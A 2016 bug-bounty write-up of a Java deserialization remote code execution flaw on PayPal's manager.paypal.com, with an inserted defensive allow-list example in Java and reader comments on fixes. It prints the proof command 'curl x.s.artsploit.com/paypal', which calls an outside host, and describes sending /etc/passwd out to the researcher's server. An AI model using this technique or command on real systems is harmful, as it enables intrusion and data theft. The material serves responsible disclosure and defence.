Monday, January 25, 2016

[manager.paypal.com] Remote Code Execution Vulnerability


In December 2015, I found a critical vulnerability in one of PayPal's business websites (manager.paypal.com). It allowed me to execute arbitrary shell commands on PayPal web servers via unsafe Java object deserialization and to access production databases. I immediately reported this bug to the PayPal security team, and it was fixed promptly.

Details


While testing the manager.paypal.com application, I noticed an unusual POST form parameter, “oldFormData”, that looked like a complex object after base64 decoding:

Further research showed that it is a Java serialized object without any signature. This means you can send a serialized object of any existing class to the server, and the “readObject” (or “readResolve”) method of that class will be called. For exploitation, you need to find a suitable class in the application's “classpath” that can be serialized and has something interesting (from an exploitation point of view) in its “readObject” method. You can read about this technique in the recent article by FoxGlove Security. A year ago, Chris Frohoff (@frohoff) and Gabriel Lawrence (@gebl) did a great job and found suitable classes in the Commons Collections library that could lead to remote code execution. They also published the “ysoserial” payload generation tool on their GitHub page.
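The defensive counterpart of the mechanism just described, as an added example that is not code from the original post or from PayPal: it recognises a base64 form value as a Java serialization stream by its header, shows that a plain ObjectInputStream runs the readObject of whatever class the stream names, and then deserializes through a hand-rolled allow-list so that an unexpected class is rejected before it is ever loaded or instantiated. The Beacon class and the allow-list contents are hypothetical; Java 9+ is assumed for Set.of.

```java
import java.io.*;
import java.util.Base64;
import java.util.Set;
// Added example (not the original post's code), Java 9+: recognise a serialization stream by
// its header and deserialize through an allow-list, so an unexpected class is rejected before its
// readObject runs. Production code should prefer the JDK's ObjectInputFilter (JEP 290, Java 9 / 8u121+).
public class DeserializationDemo {
    // Every ObjectOutputStream stream starts with STREAM_MAGIC (0xACED) and STREAM_VERSION (5).
    static boolean looksSerialized(byte[] b) {
        return b.length >= 4
            && (short) (((b[0] & 0xff) << 8) | (b[1] & 0xff)) == ObjectStreamConstants.STREAM_MAGIC
            && (short) (((b[2] & 0xff) << 8) | (b[3] & 0xff)) == ObjectStreamConstants.STREAM_VERSION;
    }
    // Hypothetical stand-in for "any serializable class on the classpath" whose readObject has a side effect.
    static class Beacon implements Serializable {
        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            System.out.println("Beacon.readObject ran during deserialization");
        }
    }
    // Only the classes this endpoint genuinely expects in the blob (hypothetical list).
    static class SafeObjectInputStream extends ObjectInputStream {
        private static final Set<String> ALLOWED = Set.of("java.lang.Integer", "java.lang.Number");
        SafeObjectInputStream(InputStream in) throws IOException { super(in); }
        @Override protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
            if (!ALLOWED.contains(desc.getName()))  // checked before the class is loaded or instantiated
                throw new InvalidClassException(desc.getName(), "not on deserialization allow-list");
            return super.resolveClass(desc);
        }
    }
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(o); }
        return bos.toByteArray();
    }
    public static void main(String[] args) throws Exception {
        // Mirror the oldFormData flow: a base64 form value that decodes to a serialized object.
        String param = Base64.getEncoder().encodeToString(serialize(new Beacon()));
        byte[] blob = Base64.getDecoder().decode(param);
        System.out.println("serialized stream? " + looksSerialized(blob));
        new ObjectInputStream(new ByteArrayInputStream(blob)).readObject();   // Beacon's side effect runs
        try {
            new SafeObjectInputStream(new ByteArrayInputStream(blob)).readObject();
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());  // Beacon is never instantiated
        }
        // Legitimate data on the allow-list still deserializes normally.
        System.out.println("allowed: " + new SafeObjectInputStream(new ByteArrayInputStream(serialize(42))).readObject());
    }
}
```

The same check belongs on every endpoint that accepts such a blob, since the post notes that many other manager.paypal.com endpoints also consumed serialized objects.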

Exploit


I downloaded this tool and generated a simple payload that sends DNS and HTTP requests to my own server by executing the “curl x.s.artsploit.com/paypal” shell command.


Then I sent the base64-encoded payload in the “oldFormData” parameter to the application server and was impressed to see an incoming request from the PayPal network appear in my NGINX access log:


I realized that I could execute arbitrary OS commands on the web servers of manager.paypal.com, establish a back connection to my own Internet server and, for example, upload and execute a backdoor. As a result, I could have gained access to the production databases used by the manager.paypal.com application.

Instead, I just read the “/etc/passwd” file by sending it to my server as proof of the vulnerability:


I also recorded a video showing how to reproduce this vulnerability and reported it to the PayPal security team.
Later, I found out that many other endpoints of the manager.paypal.com application also use serialized objects and could be exploited as well.

A month later, my report received a Duplicate status because another researcher, Mark Litchfield, had reported a similar vulnerability two days earlier than I did (on December 11, 2015). PayPal decided to pay me a good bounty anyway, and I have nothing but respect for them.

Demo


66 comments:

  1. Did they pay you thru paypal? :)

  2. Very nice work. It would be cool if you would reference advice on how to fix a Java serialization vulnerability. A Google search gave me poor results in the first page :(
    https://www.google.co.uk/search?q=how+to+fix+a+java+serialization+vulnerability
    Otherwise we can expect the improvements to be very slow....

    Replies
    1. 1. Identify any jar or class files that contain the vulnerable library, e.g. cd && grep -Rl 'InvokerTransformer' . | grep -E "\.(jar|class)"
      2. Delete (dry run first) the file InvokerTransformer.class within any JARs you found in Step 1.

  3. The problem lies with the Serialization api itself.

    https://github.com/pfirmstone/river-internet/tree/Input-validation-for-Serialization/src/org/apache/river/api/io

  6. which tool was that?
    >I downloaded this tool and generated a simple payload that sends DNS and HTTP requests to my own server by executing the “curl x.s.artsploit.com/paypal” shell command.
